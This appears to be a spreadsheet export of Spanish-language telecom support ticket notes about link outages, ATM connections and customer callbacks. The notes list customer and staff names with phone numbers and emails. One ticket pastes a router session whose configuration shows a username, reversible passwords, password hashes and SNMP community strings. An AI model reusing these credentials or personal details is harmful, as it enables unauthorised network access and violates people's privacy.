    <t>**SE LLAMA A CLIENTE PERSONAL EN TURNO AL 78550766   NO RESPONDE ENVIA A BUZON || SE INTENTARA LUEGO **
ID 3001736853
**</t>
  </si>
  <si>
    <t>F4567594</t>
  </si>
  <si>
    <t>A NIVEL DE CLARO ENLACE OK, CRONO ANTERIOR INDICA ENLACE EN MONITOREO HASTA EL DÍA LUNES A LAS 08:00AM</t>
  </si>
  <si>
    <t>A NIVEL DE CLARO ENLACE OK, CRONO ANTERIOR INDICA EN MONITOREO A SOLICITUD DE CLIENTE HASTA EL DÍA LUNES, SE DEBE VALIDAR SERVICIO A LAS 08:00AM</t>
  </si>
  <si>
    <t>F4567599</t>
  </si>
  <si>
    <t>SE TIENE EN LINEA A CLIENTE CRISTIAN CURIALES 24182428, SE LE SOLICITA APOYO PARA UBICAR EQUIPO AETHRA</t>
  </si>
  <si>
    <t>CLIENTE CHRISTIAN CURIALES 55798507 REALIZA PRUEBAS DE LLAMADAS Y VALIDA EL E1 ACTIVO. AUTORIZA EL CIERRE DEL CASO.
3001163289
COLA:
NOMBRE: A: 55798507
NÚMERO: 55798507
DURACIÓN: 0:21:08
ESTADO: DESCONECTADO [DESCONEXIÓN REMOTA]
DETALLES: 55798507
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: SAQITZUNUN.COJTI
FECHA Y HORA LOCALES: 18/05/2022 12:53:45 P. M.</t>
  </si>
  <si>
    <t>F4567606</t>
  </si>
  <si>
    <t>SE HABLO CON CLIENTE SR. ANGEL SERRANO 70709652 INFORMA QUE EL HORARIO DE ATENCION ES DE 7:30 AM A 3:30 PM, DE SER NECESARIO EL INGRESO AL SITIO SERÍA HASTA EL DIA LUNES A PRIMERA HORA.</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE WILLIAM SALOMON 23820818 NO RESPONDE, SE INTENTARA LUEGO
-ID 1001011144</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE WILLIAM SALOMON AL 77292701 NO RESPONDE, SE INTENTARA LUEGO **
ID 3001740463
**</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE WILLIAM SALOMON 77292701 NO RESPONDE, SE INTENTARA LUEGO
-ID 3001277537</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE WILLIAM SALOMON AL 77292701 NO RESPONDE, SE INTENTARA LUEGO **
ID 3001249583
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE WILLIAM SALOMON  AL 23820818 CONTESTA UNA  SEÑORITA QUIEN INDICA QUE EL SEÑOR WILLIAM NO ESTA QUE SE LE LLAME EN 20 MIN**
ID 3001180674
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE WILLIAM SALOMON AL 77292701 NO RESPONDE, SE INTENTARA LUEGO **
ID 3001197224
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE WILLIAM SALOMON  AL 77292701 INDICA QUE AUN NO ESTA EN  OFICNA QUE SE LE LLAME EN 10 MIN NUEVAMENTE**
ID 3001181560
**</t>
  </si>
  <si>
    <t>F4567607</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE JAMILETH LOPEZ AL 57283333 NO RESPONDE, SE INTENTARA LUEGO **
ID 3001183107
**</t>
  </si>
  <si>
    <t>F4567616</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE LIDIA  CRUZ AL 85102834 INDICA QUE AUN NO CUENTA CON SERVICIO QUE YA REINICIO EL EQUIPO PERO SIGUE SIN LEVANTAR || SE NOTIFICA A GESTOR **
ID 3001184718
**</t>
  </si>
  <si>
    <t>F4567619</t>
  </si>
  <si>
    <t>SE LE LLAMA A ENCARGADO DE PDV 78389860 ID: 3001180899
ATIENDE: ELIAS CALDERON, COMENTA QUE NO HABIA ENERGIA EN EL SITIO PERO DE MOMENTO TODO FUNCIONA CORRECTAMENTE, SE NOTIFICA A WAGNER.POLANCO PARA CIERRE DE INCIDENTE | WIP</t>
  </si>
  <si>
    <t>F4567620</t>
  </si>
  <si>
    <t>SE RECIBIO LA LLAMADA DE TAVSA CARLOS EL TECNICO ENCARGADO DE LA REVISIÓN EN PUNTO REMOTO, SE REALIZA LA REVISIÓN INDICA QUE LOS EQUPOS CUENTAN CON ENERGIA ELECTRICA, COMENTA QUE LED EN EQUPO RAD ETX1 SE ENCUENTRA ALARMADA TST/ALM/PWR EN COLOR ROJO, REALIZA EL REINICIO DEL EQUIPO PERO SIGUE MOSTRANDO LA ALARMA SE REVISA EN PUERTO DE CTC DEL NODO SLOT 20 PUERTO 2 NO TIENE VALORES DE POTENCIA ADECUADOS. SE ENVIARA A WO PARA LA REVISIÓN EN CONJUNTO CON TAVSA.
FIBER 2
SMALL FORM PLUGGABLE	
VENDOR NAME	CTC UNION
VENDOR PART NUMBER	SFS-7020-WA-DD
FIBER TYPE	SINGLE
WAVE LENGTH	1310 KM
WAVE LENGTH 2	1550 KM
LINK LENGTH	20 KM
DIGITAL DIAGNOSTIC	
TX POWER	-8 DBM
RX POWER	-40 DBM
RX SENSITIVITY	-23 DBM
TEMPERATURE	39 DEGREES C
SMALL FORM PLUGGABLE	
VENDOR NAME	CTC UNION
VENDOR PART NUMBER	SFS-7020-WA-DD
FIBER TYPE	SINGLE
WAVE LENGTH	1310 KM
WAVE LENGTH 2	1550 KM
LINK LENGTH	20 KM
DIGITAL DIAGNOSTIC	
TX POWER	-8 DBM
RX POWER	-19 DBM
RX SENSITIVITY	-23 DBM
TEMPERATURE	40 DEGREES C</t>
  </si>
  <si>
    <t>SE LLAMA A MONITOREO PARA CONSUTAR SOBRE LE CAJERO PERO NADIE RESPONDE.
3001801424
COLA:
NOMBRE: A: 24207212
NÚMERO: 24207212
DURACIÓN: 0:00:54
ESTADO: DESCONECTADO [COLGADO LOCALMENTE]
DETALLES: 24207212
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: CARLOSI.PALENCIA
FECHA Y HORA LOCALES: 19/05/2022 12:18:19</t>
  </si>
  <si>
    <t>SE ENVIA CORREO AL CLIENTE PARA QUE NOS APOYE CON VALIDAR LOS EQUIPOS Y CONEXIONES, A LA ESPERA DE AL RESPUESTA.
DE: CARLOS IVAN PALENCIA FLORES
ENVIADO: JUEVES, 19 DE MAYO DE 2022 12:2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052
ESTIMADO CLIENTE,
SOLICITANDO SU APOYO PARA QUE LA COORDINACIÓN QUE SE TIENE A LA 13:00 HORAS DEL DÍA DE HOY PARA QUE VALIDE LOS EQUIPOS Y CONEXIONES DEL ENLACE PRINCIPAL DEL CAJERO YA QUE SOLO ESTÁ OPERANDO POR EL 3G QUE ES EL REDUNDANTE.
TICKET: F4567620
ID: 47502192T
IDENTIFICADOR DEL CLIENTE: CC_TYT_GT_ATM3052
UBICADO EN: CAJERO 3052 COMERCIO CELUREPUESTOS NISSI 6 C. 61-67 Z.18 PINARES DEL NORTE
DE ANTEMANO MUY AGRADECIDO POR SU APOYO Y QUEDAMOS AL PENDIENTE DE SUS COMENTARIOS.
SALUDOS.</t>
  </si>
  <si>
    <t>SE LLAMARA A MONITOREO DE CAJEROS 5B RESPONDE FREDY ME INDICA QUE EL CAJERO TIENE UNA COORDINACION PARA LA 1 PM, SE LE INDICARA QUE REVISE LOS EQUIPOS Y CONEXIONES DEL ENLACE PRINCIPAL.
3001807478
COLA:
NOMBRE: A: 24207212
NÚMERO: 24207212
DURACIÓN: 0:02:57
ESTADO: DESCONECTADO [DESCONEXIÓN REMOTA]
DETALLES: 24207212
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: CARLOSI.PALENCIA
FECHA Y HORA LOCALES: 19/05/2022 12:23:09</t>
  </si>
  <si>
    <t>F4567624</t>
  </si>
  <si>
    <t>SE RECIBE LLAMADA DE ANIBAL GONZALEZ || SE LE COMENTA QUE SE ESTA TRABAJANDO REMOTAMENTE REVISANDO SERVICIO EN LOS RADIOS || CLIENTE ENTERADO DE LOS AVANCES ||</t>
  </si>
  <si>
    <t>SE LLAMÓ A CLIENTE 57081768 PARA VALIDAR LO DICHO EN CRONO ANTERIOR, NO CONTESTA; SE PIDE NUEVO APOYO A CNOC CLARO VÍA SKYPE, PARA VALIDAR CIERRE CON SD</t>
  </si>
  <si>
    <t>SE RECIBE LLAMADA DE PARTE DEL CLIENTE ANOBAL GONZALEZ SOLICITANDO AVANCES ID: 3001171262
SE LLAMA A 55550340 JOCABEL ALONZO Y SE DEJA EN CONFERENCIA CON  NICOLAS AJPACAJA  PARA PRUEBAS PENDIENTES | WIP</t>
  </si>
  <si>
    <t>F4567636</t>
  </si>
  <si>
    <t>SE LLAMA A MARIELA DONIS 42105504  MENCIONA QUE ES NUMERO EQUIVOCADO
-ID 1001273013</t>
  </si>
  <si>
    <t>F4567642</t>
  </si>
  <si>
    <t>SE TIENE RESPUESTA DEL CLIENTE VIA SKYPE DONDE ME INDICA QUE SE TIENE PROBLEMA DE ENERGIA, SE MANTENDRA EN  ETAPA PC PARA QUE SE VALIDE CUANDO RESTABLEZCA.</t>
  </si>
  <si>
    <t>F4567643</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE SR. OSWALDO SUNSIN 77218357 NO CONTESTO ID: 3001247112, 3001247021.</t>
  </si>
  <si>
    <t>EN LA CAJA 45 PAR 9 LADO CLIENTE  EN EL MDF LLEGA LA 115 PAR 9  CABLE INTERVENIDO SOLUCION  REPARACION REALIZADA EN CAMPO
USERNAME: T3LN0CR3D3S
PASSWORD:
ID1142020#SHO IP INT BRIE
INTERFACE                  IP-ADDRESS      OK? METHOD STATUS                PROTOCOL
ATM0                       UNASSIGNED      YES UNSET  UP                    UP
ATM0.1                     10.152.132.35   YES NVRAM  UP                    UP
BRI0                       UNASSIGNED      YES NVRAM  ADMINISTRATIVELY DOWN DOWN
BRI0:1                     UNASSIGNED      YES UNSET  ADMINISTRATIVELY DOWN DOWN
BRI0:2                     UNASSIGNED      YES UNSET  ADMINISTRATIVELY DOWN DOWN
FASTETHERNET0              UNASSIGNED      YES UNSET  DOWN                  DOWN
FASTETHERNET1              UNASSIGNED      YES UNSET  DOWN                  DOWN
FASTETHERNET2              UNASSIGNED      YES UNSET  UP                    UP
FASTETHERNET3              UNASSIGNED      YES UNSET  DOWN                  DOWN
LOOPBACK5                  10.166.29.226   YES NVRAM  UP                    UP
VLAN1                      190.86.221.142  YES NVRAM  UP                    UP
ID1142020#SHO ARP
PROTOCOL  ADDRESS          AGE (MIN)  HARDWARE ADDR   TYPE   INTERFACE
INTERNET  10.152.132.33           2   084F.0AC8.69AC  ARPA   ATM0.1
INTERNET  190.86.221.137          0   70CA.9B9F.DBB9  ARPA   VLAN1
INTERNET  190.86.221.138          0   INCOMPLETE      ARPA
INTERNET  190.86.221.139          0   INCOMPLETE      ARPA
INTERNET  190.86.221.140          0   INCOMPLETE      ARPA
INTERNET  190.86.221.141          0   INCOMPLETE      ARPA
INTERNET  190.86.221.142          -   2C54.2D62.2CCA  ARPA   VLAN1
ID1142020#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ATM0                          0         0         0         0      1000         3      2000         2         0
* ATM0.1                        -         -         -         -         -         -         -         -         -
  BRI0                          0         0         0         0         0         0         0         0         0
  BRI0:1                        0         0         0         0         0         0         0         0         0
  BRI0:2                        0         0         0         0         0         0         0         0         0
  FASTETHERNET0                 0         0         0         0         0         0         0         0         0
  FASTETHERNET1                 0         0         0         0         0         0         0         0         0
* FASTETHERNET2                 0         0         0         0         0         0         0         0         0
  FASTETHERNET3                 0         0         0         0         0         0         0         0         0
* LOOPBACK5                     0         0         0         0         0         0         0         0         0
* VLAN1                         0         0         0         0         0         0         0         0         0
NOTE:NO SEPARATE COUNTERS ARE MAINTAINED FOR SUBINTERFACES
     HENCE DETAILS OF SUBINTERFACE ARE NOT SHOWN
ID1142020#SHO RUN
BUILDING CONFIGURATION...
CURRENT CONFIGURATION : 5138 BYTES
!
! NO CONFIGURATION CHANGE SINCE LAST RESTART
VERSION 15.2
SERVICE NAGLE
NO SERVICE PAD
SERVICE TCP-KEEPALIVES-IN
SERVICE TCP-KEEPALIVES-OUT
SERVICE TIMESTAMPS DEBUG DATETIME MSEC LOCALTIME SHOW-TIMEZONE
SERVICE TIMESTAMPS LOG DATETIME MSEC LOCALTIME SHOW-TIMEZONE
SERVICE PASSWORD-ENCRYPTION
!
HOSTNAME ID1142020
!
BOOT-START-MARKER
BOOT-END-MARKER
!
!
LOGGING BUFFERED 4096
NO LOGGING CONSOLE
ENABLE SECRET 5 $1$H.QG$IIMSPAXKWMCQO3ZYGDZKK.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MEMORY-SIZE IOMEM 10
CLOCK TIMEZONE GMT -6 0
NO IP SOURCE-ROUTE
NO IP GRATUITOUS-ARPS
!
!
!
!
!
NO IP BOOTP SERVER
IP DOMAIN NAME TELECOM.COM.SV
IP NAME-SERVER 201.247.155.225
IP NAME-SERVER 201.247.157.225
IP CEF
NO IPV6 CEF
!
!
CRYPTO PKI TOKEN DEFAULT REMOVAL TIMEOUT 0
!
!
LICENSE UDI PID CISCO888-K9 SN FTX161386EQ
!
!
USERNAME T3LN0CR3D3S PRIVILEGE 15 PASSWORD 7 111D4A091942085E547A73
USERNAME XODUEF PRIVILEGE 15 SECRET 5 $1$KKFB$8KNUHRCJLJHJDFIPFKHLZ.
!
!
CONTROLLER DSL 0
 MODE ATM
!
IP TCP SYNWAIT-TIME 10
BRIDGE IRB
!
!
!
!
INTERFACE LOOPBACK5
 DESCRIPTION MONITOREO DEL CNOC
 IP ADDRESS 10.166.29.226 255.255.255.255
!
INTERFACE BRI0
 NO IP ADDRESS
 ENCAPSULATION HDLC
 SHUTDOWN
 ISDN TERMINATION MULTIDROP
!
INTERFACE ATM0
 NO IP ADDRESS
 NO ATM ILMI-KEEPALIVE
!
INTERFACE ATM0.1 POINT-TO-POINT
 DESCRIPTION INVERSIONES NUEVA ERA S.A DE C.V
 BANDWIDTH 2048
 IP ADDRESS 10.152.132.35 255.255.255.224
 IP VIRTUAL-REASSEMBLY IN
 ATM ROUTE-BRIDGED IP
 PVC 0/46
  ENCAPSULATION AAL5SNAP
 !
!
INTERFACE FASTETHERNET0
 NO IP ADDRESS
!
INTERFACE FASTETHERNET1
 NO IP ADDRESS
!
INTERFACE FASTETHERNET2
 NO IP ADDRESS
 DUPLEX FULL
 SPEED 100
!
INTERFACE FASTETHERNET3
 NO IP ADDRESS
 DUPLEX FULL
 SPEED 100
!
INTERFACE VLAN1
 DESCRIPTION RED LAN
 IP ADDRESS 190.86.221.142 255.255.255.248
 IP FLOW INGRESS
 IP FLOW EGRESS
!
IP FORWARD-PROTOCOL ND
NO IP HTTP SERVER
NO IP HTTP SECURE-SERVER
IP FLOW-TOP-TALKERS
 TOP 30
 SORT-BY BYTES
 CACHE-TIMEOUT 30000
!
IP ROUTE 0.0.0.0 0.0.0.0 10.152.132.33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
SNMP-SERVER COMMUNITY ESCW2KPU RO 97
SNMP-SERVER COMMUNITY NM15SNMPRO RO 88
SNMP-SERVER TRAP-SOURCE LOOPBACK5
!
!
BRIDGE 1 PROTOCOL IEEE
BRIDGE 1 ROUTE IP
BANNER LOGIN ^C
*********************************************************
*       ACCESO RESTRINGIDO / RESTRICTED ACCESS          *
* SOLO PERSONAL AUTORIZADO / AUTHORIZED PERSONNEL ONLY  *
* TODOS LOS ACCESOS SON MONITOREADOS / MONITORED ACCESS *
*********************************************************
^C
!
LINE CON 0
 AUTHORIZATION EXEC CON_ACC
 LOGIN AUTHENTICATION CON_ACC
LINE AUX 0
LINE VTY 0 4
 PASSWORD 7 070C285F4D064B
 TRANSPORT INPUT ALL
!
SCHEDULER INTERVAL 500
NTP SERVER 201.247.152.233 PREFER
NTP SERVER 201.247.152.249
END
ID1142020#  WR
BUILDING CONFIGURATION...
[OK]
ID1142020#  PING 1.1.1.1 SOUR
ID1142020#  PING 1.1.1.1 SOURCE VL
ID1142020#  PING 1.1.1.1 SOURCE VLAN 1
TYPE ESCAPE SEQUENCE TO ABORT.
SENDING 5, 100-BYTE ICMP ECHOS TO 1.1.1.1, TIMEOUT IS 2 SECONDS:
PACKET SENT WITH A SOURCE ADDRESS OF 190.86.221.142
!!!!!
SUCCESS RATE IS 100 PERCENT (5/5), ROUND-TRIP MIN/AVG/MAX = 52/52/56 MS
ID1142020#  PING 1.1.1.1 SOURCE VLAN 1 REP
ID1142020#  PING 1.1.1.1 SOURCE VLAN 1 REPEAT 1500
TYPE ESCAPE SEQUENCE TO ABORT.
SENDING 1500, 100-BYTE ICMP ECHOS TO 1.1.1.1, TIMEOUT IS 2 SECONDS:
PACKET SENT WITH A SOURCE ADDRESS OF 190.86.221.142
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
SUCCESS RATE IS 100 PERCENT (1500/1500), ROUND-TRIP MIN/AVG/MAX = 52/52/84 MS
ID1142020#</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE SR. OSWALDO SUNSIN 77218357 INFORMA QUE LOS EQUIPOS ESTAN ENCENDIDOS PERO YA SE RETIRO DEL SITIO REMOTO, INFORMA QUE SE ATIENDE HASTA EL DIA DE MAÑANA JUEVES DESDE LAS 8 AM, SE PROCEDE A COORDINAR PERSONAL TECNICO.</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE SR. OSWALDO SUNSIN 72507353 NO CONTESTA ID: 3001247343.</t>
  </si>
  <si>
    <t>F4567650</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE HECTOR 88403334 MENCIONA QUE REALIZARA PRUEBA Y LA LLAMADA SE CORTA, SE LLAMARA EN UN MOMENTO PARA VALIDAR EL FUNCIONAMIENTO
-ID 3001967090</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE HECTOR 88403334 NO RESPONDE, SE INTENTARA LUEGO
-ID 1001022934</t>
  </si>
  <si>
    <t>F4567653</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE LORENA VASQUEZ 45894458 NO RESPONDE, SE INTETARA LUEGO **
ID 3001190985
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE LORENA VASQUEZ AL 45894458 CONFIRMA SERVICIO ESTABLE Y OPERATIVO **
ID 3001747773
**</t>
  </si>
  <si>
    <t>F4567660</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE LUIS LÓPEZ +1 8668182106 OPC 3 PERO NO SE LOGRA LA COMUNICACION
-ID 3001165799</t>
  </si>
  <si>
    <t>SE ENVIA CORREO A CLIENTE
DE: ODALIS ANAHI CARDENAS SALAZAR &lt;ODALIS.CARDENAS@CLARO.COM.GT&gt;
ENVIADO: MIÉRCOLES, 18 DE MAYO DE 2022 12:49
PARA: CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;; CRLAAMNOC MAILBOX &lt;CRLAAMNOC_MAILBOX@DXC.COM&gt;
CC: GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; FONSECA BUSTAMANTE, KEVYN ANTONIO &lt;KEVYN.FONSECA@CLARO.COM.GT&gt;; JUAN MANUEL CARDONA SALAMA &lt;JUANM.CARDONA@CLARO.COM.GT&gt;
ASUNTO: RE: TICKET SD1126807
BUENA TARDE
      EN SEGUIMIENTO AL TICKET SD1126807 SOLICITAMOS DE SU APOYO VALIDANDO COMO OBSERVA EL SERVICIO ACTUALMENTE, YA QUE EL MISMO SE ENCUENTRA OPERATIVO Y ESTABLE.
 - NO SE DETECTAN EQUIPOS ASOCIADOS.
CUALQUIER CONSULTA, A LA ORDEN.
*-*-*-*-*-*</t>
  </si>
  <si>
    <t>F4567664</t>
  </si>
  <si>
    <t>SE ENVIA CORREO A CLIENTE
DE: JUAN RODRIGUEZ CRISTOBAL &lt;JUANR.RODRIGUEZ@CLARO.COM.GT&gt;ENVIADO: JUEVES, 19 DE MAYO DE 2022 16:33PARA: SERVICIOS 5B &lt;SERVICIOS5B@TYT.COM.GT&gt;; MONITOREOFALLASATM@5B.COM.GT &lt;MONITOREOFALLASATM@5B.COM.GT&gt;CC: CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;ASUNTO: ENLACE ALARMADO PARA CLIENTE "CC_TYT_GT_ATM344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7664
ID: 47502343T
IDENTIFICADOR DEL CLIENTE:  CC_TYT_GT_ATM3447
UBICADO EN:  CAJERO3447 CELUREPUESTOS NISSI 2, 6 C. 61-67 Z.18 APTO. A PINARES DEL NORTE
DE ANTEMANO MUY AGRADECIDO POR SU APOYO Y QUEDAMOS AL PENDIENTE DE SUS COMENTARIOS.
SALUDOS.</t>
  </si>
  <si>
    <t>F4567684</t>
  </si>
  <si>
    <t>SE LLAMA A LENIN QUIEN INDICA QUE SE DIRIGE A SITIO SOLICITA LLAMADA EN UNOS MINUTOS PRA SEGUIMIENTO---</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE LENIN ORELLANA AL 58345626 INDICA QUE ESTA REALIZANDO PRUEABAS SOLICITA UN MOMENTO E INDICA QUE YA ESTA ESTABLE Y OPERATIVO. AUTORIZA CIERRE DE TICKET **
ID 3001191834
**</t>
  </si>
  <si>
    <t>REPORTA INESTABILIDAD
SOLUCION SIN INTERVENCION POR PARTE DE CLARO, SE LLAMO A LENIN QUIEN  REALIZO PRUEBAS Y SERVICIO RESPONDE OK, NO SE REALIZO NINGUNA CORRECION. AUTORIZA CIERRE DE TT-</t>
  </si>
  <si>
    <t>F4567693</t>
  </si>
  <si>
    <t>SE LLAMA A MONITOREO DE CAJERO 5B ATIENDE WILLIAM RAMIREZ QUIEN INDICA QUE DE PREFERENCIA SE REALICE LA VISITA PARA CERTIFICAR MEDIO EL DÍA DE MAÑANA A LAS 10 AM, INDICA QUE SE SIGA EL PROCEDIMIENTO NORMAL ENVIANDO CORREO CON LA INFORMACIÓN DE LOS TECNICOS Y ELLOS COORDINAN CON TAVSA PARA LOS PERMISOS
3001888473
COLA:
NOMBRE: A: 24207210
NÚMERO: 24207210
DURACIÓN: 0:06:18
ESTADO: DESCONECTADO [DESCONEXIÓN REMOTA]
DETALLES: 24207210
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: MONICAMARROQUIN
FECHA Y HORA LOCALES: 19/05/2022 13:23:39</t>
  </si>
  <si>
    <t>SE ENVIA CORREO A CLIENTE SOLICITANDO APERTURA DE ATM.
DE: OMAR ALBERTO OCHOA HID &lt;OALBERTO.OCHOA@CLARO.COM.GT&gt;ENVIADO: JUEVES, 19 DE MAYO DE 2022 14:57PARA: MONITOREO FALLAS ATM &lt;MONITOREOFALLASATM@5B.COM.GT&gt;; TELECOMUNICACIONES@5B.CM.GT &lt;TELECOMUNICACIONES@5B.CM.GT&gt;; TELECOMUNICACIONES &lt;TTI@5B.COM.GT&gt;; ENLACES@5B.COM.GT &lt;ENLACES@5B.COM.GT&gt;; FALLAS@5B.COM.GT &lt;FALLAS@5B.COM.GT&gt;; LUIS GALINDO &lt;LGALINDO@5B.COM.GT&gt;CC: GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;ASUNTO: RE: CC_TYT_GT_ATM0324
BUENAS TARDES,
COMO PARTE DEL SEGUIMIENTO A LA FALLA PROACTIVA DEL ENLACE PERTENECIENTE AL ATM 0324 SE SOLICITA LA APERTURA DEL MISMO EL DÍA DE MAÑANA A LAS 10:00 HORAS, SE ADJUNTAN NOMBRE DE TECNICOS ASIGNADOS A LA ATENCIÓN DE LA FALLA. QUEDAMOS A LA ESPERA DE SUS COMENTARIOS.
WILSON CANO IBM  530048
ANDRES ORTIZ IBM  186768
SALUDOS CORDIALES</t>
  </si>
  <si>
    <t>F4567708</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE CARLOS AL 78509882 INDICA QUE YA REINICIARON EQUIPOS PERO NO LEVANTA EL SERVICIO ||
SE NOTIFICA A GESTOR **
ID 3001195607
**</t>
  </si>
  <si>
    <t>F4567729</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE EDWIN TUBAC 23049696  QUEDA ENTERADO DE LA VISITA
CLIENTE SOLICITA CUANDO SE TENGAN AVANCES DE PERSONAL TECNICO SE LE PUEDAN BRINDAR
-ID 3001255503</t>
  </si>
  <si>
    <t>F4567731</t>
  </si>
  <si>
    <t>*/*/*/SE CONTACTA CLIENTE EDISON PARA AVANCES, SE LE INDICA QUE PERDIMOS LA COMUNICACIÓN CON EL PR Y AL CONTACTAR NUEVAMENTE NOS ENVÍA A BUZÓN, BRINDA DATOS DEL PR CON GABRIELA 42305557 Y ESPERARÁ A QUE SE LE CONTACTE, SE LLAMA A GABRIELA ID: 3001233295, SE CONTACTA A GESTORA YENSI.CALGUA Y SE DEJA EN CONFERENCIA CLIENTE/GESTORA*/*/*/</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE ANGEL CABRERA AL 54752372 CL NO RESPONDE,  ENVIA A BUZON SE INTENTARA LUEGO **
ID 3001227323
**</t>
  </si>
  <si>
    <t>F4567732</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE STEFANY TEJADA 88016683 MENCIONA QUE YA TODO ESTA FUNCIONANDO CORRECTAMENTE
-ID 3001244250</t>
  </si>
  <si>
    <t>F4567735</t>
  </si>
  <si>
    <t>SE ADJUNTA TRAZADO
ROBERTOWAGNER_90001907660\VOIP&gt;&gt;LOG START
COMMAND EXECUTED
ROBERTOWAGNER_90001907660\VOIP&gt;&gt;
L1: U 18/05/2022 16:26:55:540 VOIP:
&lt;&lt;&lt; SIP RX FROM 10.16.246.199:5060:
INVITE SIP:+50222088558@IMSHWI.CLARO.COM.GT;USER=PHONE SIP/2.0
VIA: SIP/2.0/UDP 10.16.246.199:5060;BRANCH=Z9HG4BKG3Q3KJ6DLV6DRBVGVLVOMLB3IT28198
CALL-ID: ASBC8AP010AV2HRAG0RIX8XPVVXLGX2I1XZ3@ATS.GVATS1.IMSHWI.CLARO.COM.GT.7
FROM: &lt;SIP:24148921@IMSHWI.CLARO.COM.GT;USER=PHONE&gt;;TAG=SBC04050XRGJRRH-CC-7
TO: &lt;SIP:+50222088558@10.16.246.199:5060;TRANSPORT=UDP;USER=PHONE&gt;
CSEQ: 1 INVITE
ALERT-INFO: &lt;HTTP://WWW.HUAWEI.COM/RING/&gt;;INFO=PATTERN1
ALLOW: INVITE,ACK,BYE,CANCEL,UPDATE,INFO,PRACK,NOTIFY,REFER,SUBSCRIBE,OPTIONS,MESSAGE
CONTACT: &lt;SIP:24148921@10.16.246.199:5060;USER=PHONE&gt;
MAX-FORWARDS: 65
SUPPORTED: 100REL,TIMER
SESSION-EXPIRES: 600
